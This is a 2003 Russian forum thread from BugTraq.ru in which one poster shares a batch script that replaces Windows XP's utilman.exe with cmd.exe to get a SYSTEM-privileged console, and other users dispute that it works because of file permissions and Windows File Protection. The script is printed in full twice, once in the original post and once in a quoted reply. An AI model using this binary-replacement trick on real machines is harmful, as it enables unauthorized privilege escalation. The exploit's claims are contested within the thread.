информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Сетевые кракеры и правда о деле ЛевинаЗа кого нас держат?Все любят мед
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
 Умер Никлаус Вирт 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Очередной эксплоит WinXP 12.02.03 21:17  Число просмотров: 5805
Автор: lem0n Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Согласен со ЗлымШаманом. У Everyone права в %SYSTEMROOT% и ниже только на уровне "READ" и "READ and EXECUTE".
Также, Windows FIle Protection сервис моментально начнет верещать и скопирует UTILMAN.EXE из system32\dllcache обратно вместо переименyованного.

> Играясь в Винде ЭксПи с utility manager
> (\system32\utilman.exe; это такая прога, вызываемая
> WinKey+U, предназаначеная для всякого рода инвалидов, меня
> в ней интересовали mousekeys - контроль курсора мышки с
> клавы), я обнаружил следующую вещь:
> при нажатии Win+U запускается 2 utilman'a: один с правами
> текущего пользователя, второй - угадайте - правильно, с
> правами SYSTEM.
> Отсюда вытекает эксплоит с классической подменой exe-шника:
> > rem --- XPloit.utilman.bat > ------------------------------------------- > @echo off > echo WinXP Utility manager exploit. Copyleft (c) Sashman, > 2003. > echo Make sure utilman.exe is not runing. > %systemdrive% > cd %windir%\system32\ > echo Renaming utilman.exe to utilman.exp... > ren utilman.exe utilman.exp > echo Copying cmd.exe to utilman.exe... > copy cmd.exe utilman.exe > echo Press WinKey-U to obtain a console with SYSTEM > privileges. > echo After you're finished, press a key to restore utilman. > pause>>nul > del utilman.exe > echo Renaming utilman.exp to utilman.exe... > ren utilman.exp utilman.exe > echo Good bye. > rem ------------- cut here > ------------------------------------------ >
>
> Правда, есть один нюанс: консоль с системными правами НЕ
> появляется у юзера с админскими правами, хотя и присутсвует
> в списке процессов.
> (У обычных пользователей она, родимая, появляется, со всеми
> вытекающими последствиями :) ).
<hacking>
Очередной эксплоит WinXP 12.02.03 15:35  
Автор: Sashman Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Играясь в Винде ЭксПи с utility manager (\system32\utilman.exe; это такая прога, вызываемая WinKey+U, предназаначеная для всякого рода инвалидов, меня в ней интересовали mousekeys - контроль курсора мышки с клавы), я обнаружил следующую вещь:
при нажатии Win+U запускается 2 utilman'a: один с правами текущего пользователя, второй - угадайте - правильно, с правами SYSTEM.
Отсюда вытекает эксплоит с классической подменой exe-шника:
rem --- XPloit.utilman.bat ------------------------------------------- @echo off echo WinXP Utility manager exploit. Copyleft (c) Sashman, 2003. echo Make sure utilman.exe is not runing. %systemdrive% cd %windir%\system32\ echo Renaming utilman.exe to utilman.exp... ren utilman.exe utilman.exp echo Copying cmd.exe to utilman.exe... copy cmd.exe utilman.exe echo Press WinKey-U to obtain a console with SYSTEM privileges. echo After you're finished, press a key to restore utilman. pause>>nul del utilman.exe echo Renaming utilman.exp to utilman.exe... ren utilman.exp utilman.exe echo Good bye. rem ------------- cut here ------------------------------------------

Правда, есть один нюанс: консоль с системными правами НЕ появляется у юзера с админскими правами, хотя и присутсвует в списке процессов.
(У обычных пользователей она, родимая, появляется, со всеми вытекающими последствиями :) ).
Очередной эксплоит WinXP 12.02.03 21:17  
Автор: lem0n Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Согласен со ЗлымШаманом. У Everyone права в %SYSTEMROOT% и ниже только на уровне "READ" и "READ and EXECUTE".
Также, Windows FIle Protection сервис моментально начнет верещать и скопирует UTILMAN.EXE из system32\dllcache обратно вместо переименyованного.

> Играясь в Винде ЭксПи с utility manager
> (\system32\utilman.exe; это такая прога, вызываемая
> WinKey+U, предназаначеная для всякого рода инвалидов, меня
> в ней интересовали mousekeys - контроль курсора мышки с
> клавы), я обнаружил следующую вещь:
> при нажатии Win+U запускается 2 utilman'a: один с правами
> текущего пользователя, второй - угадайте - правильно, с
> правами SYSTEM.
> Отсюда вытекает эксплоит с классической подменой exe-шника:
> > rem --- XPloit.utilman.bat > ------------------------------------------- > @echo off > echo WinXP Utility manager exploit. Copyleft (c) Sashman, > 2003. > echo Make sure utilman.exe is not runing. > %systemdrive% > cd %windir%\system32\ > echo Renaming utilman.exe to utilman.exp... > ren utilman.exe utilman.exp > echo Copying cmd.exe to utilman.exe... > copy cmd.exe utilman.exe > echo Press WinKey-U to obtain a console with SYSTEM > privileges. > echo After you're finished, press a key to restore utilman. > pause>>nul > del utilman.exe > echo Renaming utilman.exp to utilman.exe... > ren utilman.exp utilman.exe > echo Good bye. > rem ------------- cut here > ------------------------------------------ >
>
> Правда, есть один нюанс: консоль с системными правами НЕ
> появляется у юзера с админскими правами, хотя и присутсвует
> в списке процессов.
> (У обычных пользователей она, родимая, появляется, со всеми
> вытекающими последствиями :) ).
Посмотри разрешения на system32 и расслабься 12.02.03 16:00  
Автор: ZloyShaman <ZloyShaman> Статус: Elderman
<"чистая" ссылка>
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach